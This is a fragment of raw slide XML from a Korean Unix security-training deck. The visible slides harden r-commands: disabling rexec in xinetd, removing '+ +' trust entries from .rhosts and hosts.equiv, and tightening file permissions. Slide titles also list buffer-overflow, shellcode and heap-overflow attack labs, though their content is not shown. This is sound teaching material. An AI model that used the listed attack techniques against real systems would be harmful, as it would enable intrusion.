              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rexec | grep disable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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제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/>
              <a:t>vi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+ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제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ko-KR" altLang="en-US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8117098-AC2E-4AF9-9B78-9B94DCD8EB8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r="505" b="39473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682069" y="1553846"/>
            <a:ext cx="4777613" cy="1568565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705017E2-13E1-4A43-9389-2A1938DE6A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1694" b="38526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="682069" y="3693635"/>
            <a:ext cx="4858531" cy="158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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D9FDA7-4D1A-471D-A4F2-45FC2B0ED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853" y="1327531"/>
            <a:ext cx="4975733" cy="734187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C07CCF-A532-44CD-A607-091A7696E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853" y="3020251"/>
            <a:ext cx="3863445" cy="334053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88DF408-18FA-483E-A1D2-ECA8B3424197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13A0F82-CE7F-4DF3-9F01-0ED8953D807F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D8D806-013D-4342-93BC-0E99670E3DC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" name="화살표: 오른쪽 12">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428D6FCE-7651-4D86-9AC4-BB32C24CD551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084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  <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst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DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제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vi /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts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+ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 저장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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작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service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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2FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="400705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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 접근 권한 변경 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>700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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv</a:t>
            </a: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endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 접근 권한 변경 및 확인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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 700 /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/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 dirty="0"/>
              <a:t># ls –l /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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8E8F543-4B21-4BE2-A553-C48DB650CEC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="515452"/>
          <a:ext cx="4932807" cy="122402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2673947949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/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sz="1000" b="1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hosts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.equiv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365527"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="844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(rlogin,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rsh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rcp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사용이 허가 또는 거부된 호스트들 및 사용자들을 나열한 파일이다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위의 예에서 첫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모든 호스트들이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앞서 허용된 호스트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호스트들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사용자들이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 뜻한다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54844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95D251-DD24-49C0-B60E-4994D7E7A136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="2867809"/>
          <a:ext cx="4932807" cy="1711706"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="517726316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~/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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rhost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90713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1453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hosts.equiv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파일과 유사하게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사용이 허가 또는 거부된 호스트들 및 사용자들을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나열한 파일이다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위의 예에서 첫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모든 호스트들이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번째 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기호는 앞서 허용된 호스트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호스트들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사용자들이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명령어를 사용할 수 있도록 신뢰함을 뜻한다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hosts.equiv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수록된 호스트들 및 사용자들은 시스템에 전역적으로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(globally)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적용되지만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.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rhost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수록된 호스트들 및 사용자들은 해당 계정 접근 시에만 적용된다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992199"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968E0337-4106-4EAC-BF96-386F65B1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32" y="5380115"/>
            <a:ext cx="5019040" cy="670433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8548DEE-1065-4E82-B67E-6CE038AD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728" y="1111454"/>
            <a:ext cx="4861560" cy="108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32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D747B25A-341F-4D83-BF42-F6B408465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728" y="3216932"/>
            <a:ext cx="4602480" cy="10134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FEDB8B-2514-4783-911F-090859734658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4522543"/>
            <a:ext cx="5616792" cy="19664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000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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04A819-9527-40B3-A930-34332102371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0F0EEF2-3CA1-4C1A-BB0D-29B474CF59C2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E1A243-A4BA-4772-85F4-5ED2DA18A3C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423405C-4958-48C5-B98D-DE37797AEDCA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2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4097</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>1105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3" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>HY헤드라인M</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>문체부 훈민정음체</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>정보보호 5강</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/1  1. 파일 접근 권한 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/2  2. 시스템 로그 점검</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/3  3. R-명령어 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/4  4. 계정 원격 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/5  5. 계정 우회 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF - 힙</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF – 힙 -대응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정보보호 4강</dc:title>
  <dc:creator>Author</dc:creator>
  <cp:lastModifiedBy>Author</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-12T04:09:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-19T16:14:22Z</dcterms:modified>
</cp:coreProperties>
</file>